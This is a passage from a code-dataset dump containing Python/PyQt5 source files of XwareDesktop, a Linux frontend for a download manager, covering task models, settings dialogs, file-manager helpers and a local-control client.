"is_vendor": false,
"language": "Python",
"length_bytes": 4092,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 116,
"path": "/src/frontend/models/ProxyModel.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal, QModelIndex, QSortFilterProxyModel, Qt, Q_ENUMS, \\\n pyqtProperty\nfrom PyQt5.QtQml import qmlRegisterUncreatableType\n\nfrom utils.misc import dropPy34Enum\nfrom .TaskModel import CreationTimeRole, TaskClass, TaskClassRole\n\n\nclass ProxyModel(QSortFilterProxyModel):\n srcDataChanged = pyqtSignal(int, int) # row1, row2\n taskClassFilterChanged = pyqtSignal()\n\n Q_ENUMS(dropPy34Enum(TaskClass))\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setDynamicSortFilter(True)\n self.sort(0, Qt.DescendingOrder)\n self.setFilterCaseSensitivity(False)\n self._taskClassFilter = TaskClass.RUNNING\n\n @pyqtProperty(int, notify = taskClassFilterChanged)\n def taskClassFilter(self):\n return self._taskClassFilter\n\n @taskClassFilter.setter\n def taskClassFilter(self, value):\n if value != self._taskClassFilter:\n self._taskClassFilter = value\n self.taskClassFilterChanged.emit()\n self.invalidateFilter()\n\n def filterAcceptsRow(self, srcRow: int, srcParent: QModelIndex):\n result = super().filterAcceptsRow(srcRow, srcParent)\n if result:\n srcModel = self.sourceModel()\n klass = srcModel.data(srcModel.index(srcRow, 0), TaskClassRole)\n if klass & self.taskClassFilter:\n return True\n else:\n return False\n\n return result\n\n @pyqtSlot(QModelIndex, QModelIndex, \"QVector<int>\")\n def _slotSrcDataChanged(self, topLeft, bottomRight, roles):\n self.srcDataChanged.emit(topLeft.row(), bottomRight.row())\n\n def setSourceModel(self, model):\n model.dataChanged.connect(self._slotSrcDataChanged)\n super().setSourceModel(model)\n self.setSortRole(CreationTimeRole)\n\n @pyqtSlot(int, result = \"QVariant\")\n def get(self, i: int):\n index = self.mapToSource(self.index(i, 0))\n return self.sourceModel().get(index)\n\n def _getModelIndex(self, rowId):\n return self.index(rowId, 0)\n\n def _getSourceModelIndex(self, rowId):\n return self.mapToSource(self._getModelIndex(rowId))\n\n def _getModelIndice(self, rowIds):\n return map(lambda row: self.index(row, 0), rowIds)\n\n def _getSourceModelIndice(self, rowIds):\n return map(self.mapToSource, self._getModelIndice(rowIds))\n\n @pyqtSlot(str, result = \"void\")\n def setNameFilter(self, name):\n if name:\n self.setFilterFixedString(name)\n else:\n self.setFilterFixedString(None)\n\n @pyqtSlot(\"QVariantMap\", result = \"void\")\n def pauseTasks(self, options):\n srcIndice = list(self._getSourceModelIndice(options[\"rows\"]))\n self.sourceModel().pauseTasks(srcIndice, options)\n\n @pyqtSlot(\"QVariantMap\", result = \"void\")\n def startTasks(self, options):\n srcIndice = list(self._getSourceModelIndice(options[\"rows\"]))\n self.sourceModel().startTasks(srcIndice, options)\n\n @pyqtSlot(int, result = \"void\")\n def systemOpen(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().systemOpen(srcIndex)\n\n @pyqtSlot(int, bool, result = \"void\")\n def openLixianChannel(self, rowId, enable: bool):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().openLixianChannel(srcIndex, enable)\n\n @pyqtSlot(int, result = \"void\")\n def openVipChannel(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().openVipChannel(srcIndex)\n\n @pyqtSlot(int, result = \"void\")\n def viewOneTask(self, rowId):\n srcIndex = self._getSourceModelIndex(rowId)\n self.sourceModel().viewOneTask(srcIndex)\n\n @pyqtSlot(\"QList<int>\", result = \"void\")\n def viewMultipleTasks(self, rowIds):\n srcIndice = list(self._getSourceModelIndice(rowIds))\n self.sourceModel().viewMultipleTasks(srcIndice)\n\nqmlRegisterUncreatableType(ProxyModel, 'TaskModel', 1, 0, 'TaskModel',\n \"TaskModel cannot be created.\")\n"
},
{
"alpha_fraction": 0.6721683144569397,
"alphanum_fraction": 0.6744336485862732,
"avg_line_length": 33.33333206176758,
"blob_id": "c76b36171f203d440b9db5416934d3c16296c132",
"content_id": "1e626bc2c3f45a3e8e2679f283129dfc33c92f64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3094,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 90,
"path": "/src/frontend/Settings/QuickSpeedLimit.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QWidget, QWidgetAction\n\nfrom etmpy import EtmSetting\nfrom CustomStatusBar.CStatusButton import CustomStatusBarToolButton\nfrom .ui_quickspeedlimit import Ui_Form_quickSpeedLimit\nfrom .menu import SettingMenu\n\n\nclass QuickSpeedLimitBtn(CustomStatusBarToolButton):\n def __init__(self, parent):\n super().__init__(parent)\n menu = SettingMenu(self)\n action = SpeedLimitingWidgetAction(self)\n menu.addAction(action)\n self.setMenu(menu)\n self.setText(\"限速\")\n\n # Should be disabled when ETM not running\n app.xwaredpy.statusUpdated.connect(self.slotXwareStatusChanged)\n self.slotXwareStatusChanged()\n\n @pyqtSlot()\n def slotXwareStatusChanged(self):\n self.setEnabled(app.xwaredpy.etmStatus)\n\n\nclass SpeedLimitingWidgetAction(QWidgetAction):\n def __init__(self, parent):\n super().__init__(parent)\n widget = QuickSpeedLimitForm(parent)\n self.setDefaultWidget(widget)\n\n\nclass QuickSpeedLimitForm(QWidget, Ui_Form_quickSpeedLimit):\n def __init__(self, parent):\n super().__init__(parent)\n self.setupUi(self)\n self.checkBox_ulSpeedLimit.stateChanged.connect(self.slotStateChanged)\n self.checkBox_dlSpeedLimit.stateChanged.connect(self.slotStateChanged)\n self.slotStateChanged()\n\n def slotStateChanged(self):\n self.spinBox_ulSpeedLimit.setEnabled(self.checkBox_ulSpeedLimit.isChecked())\n self.spinBox_dlSpeedLimit.setEnabled(self.checkBox_dlSpeedLimit.isChecked())\n\n def loadSetting(self):\n etmSettings = app.etmpy.getSettings()\n\n self.setEnabled(bool(etmSettings))\n if not self.isEnabled():\n return\n\n if etmSettings.dLimit == -1:\n self.checkBox_dlSpeedLimit.setChecked(False)\n self.spinBox_dlSpeedLimit.setValue(app.settings.getint(\"internal\", \"dlspeedlimit\"))\n else:\n self.checkBox_dlSpeedLimit.setChecked(True)\n self.spinBox_dlSpeedLimit.setValue(etmSettings.dLimit)\n\n if etmSettings.uLimit == -1:\n self.checkBox_ulSpeedLimit.setChecked(False)\n self.spinBox_ulSpeedLimit.setValue(app.settings.getint(\"internal\", \"ulspeedlimit\"))\n else:\n self.checkBox_ulSpeedLimit.setChecked(True)\n self.spinBox_ulSpeedLimit.setValue(etmSettings.uLimit)\n\n def saveSetting(self):\n if not self.isEnabled():\n return\n\n # called by parent menu's saveSettings.\n if self.checkBox_ulSpeedLimit.isChecked():\n ulSpeedLimit = self.spinBox_ulSpeedLimit.value()\n else:\n ulSpeedLimit = -1\n\n if self.checkBox_dlSpeedLimit.isChecked():\n dlSpeedLimit = self.spinBox_dlSpeedLimit.value()\n else:\n dlSpeedLimit = -1\n\n newEtmSetting = EtmSetting(dLimit = dlSpeedLimit, uLimit = ulSpeedLimit,\n maxRunningTasksNum = None)\n app.etmpy.saveSettings(newEtmSetting)\n"
},
{
"alpha_fraction": 0.6232837438583374,
"alphanum_fraction": 0.6275743842124939,
"avg_line_length": 25.687023162841797,
"blob_id": "2af0a8d888c38445a1e30784d1835be19124cc29",
"content_id": "183d0b8c9724026552863a997cc0cb615c69a149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3496,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 131,
"path": "/src/frontend/utils/system.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtGui import QDesktopServices\n\nimport enum\nfrom collections import defaultdict\nfrom itertools import groupby\nimport os, subprocess, errno\n\nfrom .decorators import simplecache\n\n\[email protected]\nclass InitType(enum.Enum):\n SYSTEMD = 1\n UPSTART = 2\n UPSTART_WITHOUT_USER_SESSION = 3\n UNKNOWN = 4\n\n\n@simplecache\ndef getInitType():\n with subprocess.Popen([\"init\", \"--version\"], stdout = subprocess.PIPE) as proc:\n initVersion = str(proc.stdout.read())\n\n if \"systemd\" in initVersion:\n return InitType.SYSTEMD\n elif \"upstart\" in initVersion:\n if \"UPSTART_SESSION\" in os.environ:\n return InitType.UPSTART\n else:\n return InitType.UPSTART_WITHOUT_USER_SESSION\n else:\n # On Fedora \"init --version\" gives an error\n # Use an alternative method\n try:\n realInitPath = os.readlink(\"/usr/sbin/init\")\n if realInitPath.endswith(\"systemd\"):\n return InitType.SYSTEMD\n except FileNotFoundError:\n pass\n except OSError as e:\n if e.errno == errno.EINVAL:\n pass # Not a symlink\n else:\n raise e # rethrow\n\n return InitType.UNKNOWN\n\n\[email protected]\nclass FileManagerType(enum.Enum):\n Dolphin = 1\n Thunar = 2\n PCManFM = 3\n Nemo = 4\n Nautilus = 5\n Unknown = 6\n\n\n@simplecache\ndef getFileManagerType():\n with subprocess.Popen([\"xdg-mime\", \"query\", \"default\", \"inode/directory\"],\n stdout = subprocess.PIPE) as proc:\n output = str(proc.stdout.read()).lower()\n\n if \"dolphin\" in output:\n return FileManagerType.Dolphin\n elif \"nautilus\" in output:\n return FileManagerType.Nautilus\n elif \"nemo\" in output:\n return FileManagerType.Nemo\n elif \"pcmanfm\" in output:\n return FileManagerType.PCManFM\n elif \"thunar\" in output:\n return FileManagerType.Thunar\n\n return FileManagerType.Unknown\n\n\ndef runAsIndependentProcess(line: \"ls -al\"):\n \"\"\"\n Useful when we don't care about input/output/return value.\n :param line: command line to run\n :return: None\n \"\"\"\n pid = os.fork()\n if pid == 0:\n # child\n parts = line.split(\" \")\n os.execvp(parts[0], parts)\n else:\n return\n\n\ndef systemOpen(url: str):\n qUrl = QUrl.fromLocalFile(url)\n QDesktopServices.openUrl(qUrl)\n\n\ndef viewMultipleFiles(files: \"list<str of file paths>\"):\n files = sorted(files)\n\n d = defaultdict(list)\n for path, filenames in groupby(files, key = os.path.dirname):\n for filename in filenames:\n d[path].append(filename)\n\n fileManager = getFileManagerType()\n\n if fileManager == FileManagerType.Dolphin:\n for path in d:\n os.system(\"dolphin --select {}\".format(\" \".join(d[path])))\n else:\n # Thunar, PCManFM, Nemo don't support select at all!\n # Nautilus doesn't support selecting multiple files.\n # fallback using systemOpen\n for path in d:\n systemOpen(path)\n\n\ndef viewOneFile(file: \"str of file path\"):\n fileManager = getFileManagerType()\n if fileManager == FileManagerType.Dolphin:\n runAsIndependentProcess(\"dolphin --select {}\".format(file))\n elif fileManager == FileManagerType.Nautilus:\n runAsIndependentProcess(\"nautilus --select {}\".format(file))\n else:\n # fallback\n systemOpen(os.path.dirname(file))\n"
},
{
"alpha_fraction": 0.6412146091461182,
"alphanum_fraction": 0.6446540951728821,
"avg_line_length": 41.5774040222168,
"blob_id": "ad211dba8368db00bca3555540e443821db64e8c",
"content_id": "8d791c517e43af943f6b1e98fca21bf7939fcb85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10310,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 239,
"path": "/src/frontend/Settings/dialog.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, Qt\nfrom PyQt5.QtWidgets import QDialog, QTableWidgetItem, QButtonGroup, QFileDialog, QMessageBox\nfrom PyQt5.QtGui import QBrush\n\nimport os\nfrom utils.system import getInitType, InitType\n\nfrom xwaredpy import InvalidSocket\nfrom etmpy import EtmSetting\nfrom .ui_settings import Ui_Dialog\n\n\nclass SettingsDialog(QDialog, Ui_Dialog):\n def __init__(self, parent):\n super().__init__(parent)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n self.setupUi(self)\n\n self.lineEdit_loginUsername.setText(app.settings.get(\"account\", \"username\"))\n self.lineEdit_loginPassword.setText(app.settings.get(\"account\", \"password\"))\n self.checkBox_autoLogin.setChecked(app.settings.getbool(\"account\", \"autologin\"))\n self.checkBox_autoStartFrontend.setChecked(app.autoStart)\n\n # Xwared Management\n managedBySystemd = app.xwaredpy.managedBySystemd\n managedByUpstart = app.xwaredpy.managedByUpstart\n managedByAutostart = app.xwaredpy.managedByAutostart\n\n self.radio_managedBySystemd.setChecked(managedBySystemd)\n self.radio_managedByUpstart.setChecked(managedByUpstart)\n self.radio_managedByAutostart.setChecked(managedByAutostart)\n self.radio_managedByNothing.setChecked(\n not (managedBySystemd or managedByUpstart or managedByAutostart))\n\n initType = getInitType()\n self.radio_managedBySystemd.setEnabled(initType == InitType.SYSTEMD)\n self.radio_managedByUpstart.setEnabled(initType == InitType.UPSTART)\n\n # frontend\n self.checkBox_enableDevelopersTools.setChecked(\n app.settings.getbool(\"frontend\", \"enabledeveloperstools\"))\n self.checkBox_allowFlash.setChecked(app.settings.getbool(\"frontend\", \"allowflash\"))\n self.checkBox_minimizeToSystray.setChecked(\n app.settings.getbool(\"frontend\", \"minimizetosystray\"))\n self.checkBox_closeToMinimize.setChecked(\n app.settings.getbool(\"frontend\", \"closetominimize\"))\n self.checkBox_popNotifications.setChecked(\n app.settings.getbool(\"frontend\", \"popnotifications\"))\n self.checkBox_notifyBySound.setChecked(\n app.settings.getbool(\"frontend\", \"notifybysound\"))\n self.checkBox_showMonitorWindow.setChecked(\n app.settings.getbool(\"frontend\", \"showmonitorwindow\"))\n self.spinBox_monitorFullSpeed.setValue(\n app.settings.getint(\"frontend\", \"monitorfullspeed\"))\n\n # clipboard related\n self.checkBox_watchClipboard.stateChanged.connect(self.slotWatchClipboardToggled)\n self.checkBox_watchClipboard.setChecked(app.settings.getbool(\"frontend\", \"watchclipboard\"))\n self.slotWatchClipboardToggled(self.checkBox_watchClipboard.checkState())\n self.plaintext_watchPattern.setPlainText(app.settings.get(\"frontend\", \"watchpattern\"))\n\n self.btngrp_etmStartWhen = QButtonGroup()\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen1, 1)\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen2, 2)\n self.btngrp_etmStartWhen.addButton(self.radio_backendStartWhen3, 3)\n\n startEtmWhen = app.xwaredpy.startEtmWhen\n if startEtmWhen:\n self.btngrp_etmStartWhen.button(startEtmWhen).setChecked(True)\n else:\n self.group_etmStartWhen.setEnabled(False)\n\n self.btn_addMount.clicked.connect(self.slotAddMount)\n self.btn_removeMount.clicked.connect(self.slotRemoveMount)\n\n # Mounts\n self.setupMounts()\n\n # backend setting is a different thing!\n self.setupETM()\n\n @pyqtSlot(int)\n def slotWatchClipboardToggled(self, state):\n self.plaintext_watchPattern.setEnabled(state)\n\n @pyqtSlot()\n def setupMounts(self):\n self.table_mounts.setRowCount(0)\n self.table_mounts.clearContents()\n\n mountsMapping = app.mountsFaker.getMountsMapping()\n for i, mount in enumerate(app.mountsFaker.mounts):\n self.table_mounts.insertRow(i)\n # drive1: the drive letter it should map to, by alphabetical order\n drive1 = app.mountsFaker.driveIndexToLetter(i)\n self.table_mounts.setItem(i, 0, QTableWidgetItem(drive1 + \"\\\\TDDOWNLOAD\"))\n\n # mounts = ['/path/to/1', 'path/to/2', ...]\n self.table_mounts.setItem(i, 1, QTableWidgetItem(mount))\n\n # drive2: the drive letter it actually is assigned to\n drive2 = mountsMapping.get(mount, \"无\")\n\n errors = []\n\n # check: mapping\n if drive1 != drive2:\n errors.append(\n \"错误:盘符映射在'{actual}',而不是'{should}'。\\n\"\n \"如果这是个新挂载的文件夹,请尝试稍等,或重启后端,可能会修复此问题。\"\n .format(actual = drive2, should = drive1))\n\n brush = QBrush()\n if errors:\n brush.setColor(Qt.red)\n errString = \"\\n\".join(errors)\n else:\n brush.setColor(Qt.darkGreen)\n errString = \"正常\"\n errWidget = QTableWidgetItem(errString)\n errWidget.setForeground(brush)\n\n self.table_mounts.setItem(i, 2, errWidget)\n del brush, errWidget\n\n self.table_mounts.resizeColumnsToContents()\n\n @pyqtSlot()\n def slotAddMount(self):\n fileDialog = QFileDialog(self, Qt.Dialog)\n fileDialog.setFileMode(QFileDialog.Directory)\n fileDialog.setOption(QFileDialog.ShowDirsOnly, True)\n fileDialog.setViewMode(QFileDialog.List)\n fileDialog.setDirectory(os.environ[\"HOME\"])\n if fileDialog.exec():\n selected = fileDialog.selectedFiles()[0]\n if selected in self.newMounts:\n return\n row = self.table_mounts.rowCount()\n self.table_mounts.insertRow(row)\n self.table_mounts.setItem(\n row, 0,\n QTableWidgetItem(app.mountsFaker.driveIndexToLetter(row) + \"\\\\TDDOWNLOAD\"))\n self.table_mounts.setItem(row, 1, QTableWidgetItem(selected))\n self.table_mounts.setItem(row, 2, QTableWidgetItem(\"新近添加\"))\n\n @pyqtSlot()\n def slotRemoveMount(self):\n row = self.table_mounts.currentRow()\n self.table_mounts.removeRow(row)\n\n @pyqtSlot()\n def accept(self):\n app.settings.set(\"account\", \"username\", self.lineEdit_loginUsername.text())\n app.settings.set(\"account\", \"password\", self.lineEdit_loginPassword.text())\n app.settings.setbool(\"account\", \"autologin\", self.checkBox_autoLogin.isChecked())\n\n app.autoStart = self.checkBox_autoStartFrontend.isChecked()\n\n app.xwaredpy.managedBySystemd = self.radio_managedBySystemd.isChecked()\n app.xwaredpy.managedByUpstart = self.radio_managedByUpstart.isChecked()\n app.xwaredpy.managedByAutostart = self.radio_managedByAutostart.isChecked()\n\n app.settings.setbool(\"frontend\", \"enabledeveloperstools\",\n self.checkBox_enableDevelopersTools.isChecked())\n app.settings.setbool(\"frontend\", \"allowflash\",\n self.checkBox_allowFlash.isChecked())\n app.settings.setbool(\"frontend\", \"minimizetosystray\",\n self.checkBox_minimizeToSystray.isChecked())\n\n # A possible Qt bug\n # https://bugreports.qt-project.org/browse/QTBUG-37695\n app.settings.setbool(\"frontend\", \"closetominimize\",\n self.checkBox_closeToMinimize.isChecked())\n app.settings.setbool(\"frontend\", \"popnotifications\",\n self.checkBox_popNotifications.isChecked())\n app.settings.setbool(\"frontend\", \"notifybysound\",\n self.checkBox_notifyBySound.isChecked())\n\n app.settings.setbool(\"frontend\", \"showmonitorwindow\",\n self.checkBox_showMonitorWindow.isChecked())\n app.settings.setint(\"frontend\", \"monitorfullspeed\",\n self.spinBox_monitorFullSpeed.value())\n app.settings.setbool(\"frontend\", \"watchclipboard\",\n self.checkBox_watchClipboard.isChecked())\n app.settings.set(\"frontend\", \"watchpattern\",\n self.plaintext_watchPattern.toPlainText())\n\n if self.group_etmStartWhen.isEnabled():\n startEtmWhen = self.btngrp_etmStartWhen.id(self.btngrp_etmStartWhen.checkedButton())\n try:\n app.xwaredpy.startEtmWhen = startEtmWhen\n except InvalidSocket:\n QMessageBox.warning(None, \"Xware Desktop\",\n \"选项未能成功设置:{}。\".format(self.group_etmStartWhen.title()),\n QMessageBox.Ok, QMessageBox.Ok)\n\n app.settings.save()\n\n app.mountsFaker.mounts = self.newMounts\n app.settings.applySettings.emit()\n super().accept()\n\n @property\n def newMounts(self):\n return list(map(lambda row: self.table_mounts.item(row, 1).text(),\n range(self.table_mounts.rowCount())))\n\n @pyqtSlot()\n def setupETM(self):\n # fill values\n lcPort = app.xwaredpy.lcPort\n self.lineEdit_lcport.setText(str(lcPort) if lcPort else \"不可用\")\n\n etmSettings = app.etmpy.getSettings()\n if etmSettings:\n self.spinBox_dSpeedLimit.setValue(etmSettings.dLimit)\n self.spinBox_uSpeedLimit.setValue(etmSettings.uLimit)\n self.spinBox_maxRunningTasksNum.setValue(etmSettings.maxRunningTasksNum)\n\n # connect signals\n self.accepted.connect(self.saveETM)\n else:\n self.spinBox_dSpeedLimit.setEnabled(False)\n self.spinBox_uSpeedLimit.setEnabled(False)\n self.spinBox_maxRunningTasksNum.setEnabled(False)\n\n @pyqtSlot()\n def saveETM(self):\n newsettings = EtmSetting(dLimit = self.spinBox_dSpeedLimit.value(),\n uLimit = self.spinBox_uSpeedLimit.value(),\n maxRunningTasksNum = self.spinBox_maxRunningTasksNum.value())\n\n app.etmpy.saveSettings(newsettings)\n"
},
{
"alpha_fraction": 0.6046662330627441,
"alphanum_fraction": 0.6063512563705444,
"avg_line_length": 27.054546356201172,
"blob_id": "87e2e51cfe3490f498d2bab718d40d7b9bb9616f",
"content_id": "17c772d324e223b45e86e8e11964727cf61ba21c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7715,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 275,
"path": "/src/frontend/libxware/item.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\nfrom PyQt5.QtCore import pyqtProperty, pyqtSignal, QObject\nfrom models.ProxyModel import TaskClass\n\nfrom .vanilla import TaskClass as XwareTaskClass\n\n_SPEED_SAMPLE_COUNT = 50\n\n\nclass VipChannel(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._type = None\n self._size = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._state = None\n self._available = None\n self._errorCode = None\n\n @pyqtProperty(int, notify = updated)\n def type(self):\n return self._type\n\n @pyqtProperty(int, notify = updated)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self._speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = updated)\n def available(self):\n return self._available\n\n @pyqtProperty(int, notify = updated)\n def errorCode(self):\n return self._errorCode\n\n def update(self, data):\n self._type = data.get(\"type\")\n self._size = data.get(\"dlBytes\")\n self.speed = data.get(\"speed\")\n self._state = data.get(\"opened\")\n self._available = data.get(\"available\")\n self._errorCode = data.get(\"failCode\")\n self.updated.emit()\n\n\nclass LixianChannel(QObject):\n updated = pyqtSignal()\n\n def __init__(self, parent):\n super().__init__(parent)\n self._state = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._size = None\n self._serverSpeed = None\n self._serverProgress = None\n self._errorCode = None\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self.speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def serverSpeed(self):\n return self._serverSpeed\n\n @pyqtProperty(int, notify = updated)\n def serverProgress(self):\n return self._serverProgress\n\n @pyqtProperty(int, notify = updated)\n def errorCode(self):\n return self._errorCode\n\n def update(self, data):\n self._state = data.get(\"state\")\n self.speed = data.get(\"speed\")\n self._size = data.get(\"dlBytes\")\n self._serverSpeed = data.get(\"serverSpeed\")\n self._serverProgress = data.get(\"serverProgress\")\n self._errorCode = data.get(\"failCode\")\n self.updated.emit()\n\n\nclass XwareTaskItem(QObject):\n initialized = pyqtSignal()\n updated = pyqtSignal()\n errorOccurred = pyqtSignal()\n\n def __init__(self, *, adapter):\n super().__init__(None)\n self._initialized = False\n self._adapter = adapter\n self._namespace = self._adapter.namespace\n self._klass = None\n\n self._id = None\n self._name = None\n self._speed = None\n self._speeds = [0] * _SPEED_SAMPLE_COUNT\n self._progress = None\n self._creationTime = None\n self._runningTime = None\n self._remainingTime = None\n self._completionTime = None\n self._state = None\n self._path = None\n self._size = None\n self._errorCode = None\n\n self._vipChannel = VipChannel(self)\n self._lixianChannel = LixianChannel(self)\n\n self.moveToThread(app.thread())\n self.setParent(app.taskModel)\n\n @pyqtProperty(int, notify = initialized)\n def realid(self):\n return self._id\n\n @pyqtProperty(str, notify = initialized)\n def id(self):\n return self.namespace + \"|\" + str(self.realid)\n\n @pyqtProperty(str, notify = initialized)\n def name(self):\n return self._name\n\n @pyqtProperty(int, notify = initialized)\n def creationTime(self):\n return self._creationTime\n\n @pyqtProperty(str, notify = initialized)\n def path(self):\n return self._path\n\n @pyqtProperty(str, notify = initialized)\n def namespace(self):\n return self._namespace\n\n @pyqtProperty(int, notify = initialized)\n def size(self):\n return self._size\n\n @pyqtProperty(int, notify = updated)\n def speed(self):\n return self._speed\n\n @speed.setter\n def speed(self, value):\n self._speed = value\n self._speeds = self._speeds[1:] + [value]\n\n @pyqtProperty(\"QList<int>\", notify = updated)\n def speeds(self):\n return self._speeds\n\n @pyqtProperty(int, notify = updated)\n def progress(self):\n return self._progress\n\n @pyqtProperty(int, notify = updated)\n def remainingTime(self):\n return self._remainingTime\n\n @pyqtProperty(int, notify = updated)\n def completionTime(self):\n return self._completionTime\n\n @pyqtProperty(int, notify = updated)\n def state(self):\n return self._state\n\n @pyqtProperty(int, notify = errorOccurred)\n def errorCode(self):\n return self._errorCode\n\n @pyqtProperty(QObject, notify = initialized)\n def vipChannel(self):\n return self._vipChannel\n\n @pyqtProperty(QObject, notify = initialized)\n def lixianChannel(self):\n return self._lixianChannel\n\n @property\n def fullpath(self):\n return self.path + self.name\n\n @pyqtProperty(int, notify = updated)\n def klass(self):\n # _klass is xware class[0-3],\n # return Xware Desktop task class\n return 1 << self._klass\n\n # Xware Local Control doesn't always return reliable state,\n # needs to use class directly\n\n # return {\n # XwareTaskClass.DOWNLOADING: TaskClass.RUNNING,\n # XwareTaskClass.WAITING: TaskClass.RUNNING,\n # XwareTaskClass.STOPPED: TaskClass.RUNNING,\n # XwareTaskClass.PAUSED: TaskClass.RUNNING,\n # XwareTaskClass.FINISHED: TaskClass.COMPLETED,\n # XwareTaskClass.FAILED: TaskClass.FAILED,\n # XwareTaskClass.UPLOADING: TaskClass.RUNNING,\n # XwareTaskClass.SUBMITTING: TaskClass.RUNNING,\n # XwareTaskClass.DELETED: TaskClass.RECYCLED,\n # XwareTaskClass.RECYCLED: TaskClass.RECYCLED,\n # XwareTaskClass.SUSPENDED: TaskClass.RUNNING,\n # XwareTaskClass.ERROR: TaskClass.FAILED,\n # }[self.state]\n\n def update(self, data, klass):\n self._klass = klass\n\n self.speed = data.get(\"speed\")\n self._remainingTime = data.get(\"remainTime\")\n self._state = data.get(\"state\")\n self._completionTime = data.get(\"completeTime\")\n self._progress = data.get(\"progress\")\n self._runningTime = data.get(\"downTime\")\n\n self._vipChannel.update(data.get(\"vipChannel\"))\n self._lixianChannel.update(data.get(\"lixianChannel\"))\n\n if not self._initialized:\n self._id = data.get(\"id\")\n self._name = data.get(\"name\")\n self._creationTime = data.get(\"createTime\")\n self._path = data.get(\"path\")\n self._size = data.get(\"size\")\n self._initialized = True\n self.initialized.emit()\n\n self.updated.emit()\n"
},
{
"alpha_fraction": 0.5708884596824646,
"alphanum_fraction": 0.5784499049186707,
"avg_line_length": 32.80826950073242,
"blob_id": "290c31dbaaf6463b222cdd9b79285ad22f432c5a",
"content_id": "09e4dc7b8e7fc5d38db83b9857f96742d8d95067",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9075,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 266,
"path": "/src/frontend/etmpy.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal\n\nimport threading, time\nimport requests, json\nfrom json.decoder import scanner, scanstring\nimport collections\nfrom requests.exceptions import ConnectionError\nfrom urllib.parse import unquote\nfrom datetime import datetime\n\n\nclass LocalCtrlNotAvailableError(BaseException):\n pass\n\nEtmSetting = collections.namedtuple(\"EtmSetting\", [\"dLimit\", \"uLimit\", \"maxRunningTasksNum\"])\nActivationStatus = collections.namedtuple(\"ActivationStatus\",\n [\"userid\", \"status\", \"code\", \"peerid\"])\n\n\nclass _TaskPollingJsonDecoder(json.JSONDecoder):\n # This class automatically unquotes URL-quoted characters like %20\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.parse_string = self.unquote_parse_string\n # \"rebuild\" scan_once\n # scanner.c_make_scanner doesn't seem to support custom parse_string.\n self.scan_once = scanner.py_make_scanner(self)\n\n @staticmethod\n def unquote_parse_string(*args, **kwargs):\n result = scanstring(*args, **kwargs) # => (str, end_index)\n unquotedResult = (unquote(result[0]), result[1])\n return unquotedResult\n\n\nclass EtmPy(QObject):\n sigTasksSummaryUpdated = pyqtSignal([bool], [dict])\n\n runningTasksStat = None\n completedTasksStat = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # task stats\n self.runningTasksStat = RunningTaskStatistic(self)\n self.completedTasksStat = CompletedTaskStatistic(self)\n self.t = threading.Thread(target = self.pollTasks, daemon = True,\n name = \"tasks polling\")\n self.t.start()\n\n @property\n def lcontrol(self):\n lcPort = app.xwaredpy.lcPort\n if not lcPort:\n raise LocalCtrlNotAvailableError()\n return \"http://127.0.0.1:{}/\".format(lcPort)\n\n def getSettings(self):\n try:\n req = requests.get(self.lcontrol + \"getspeedlimit\")\n limits = req.json()[1:] # not sure 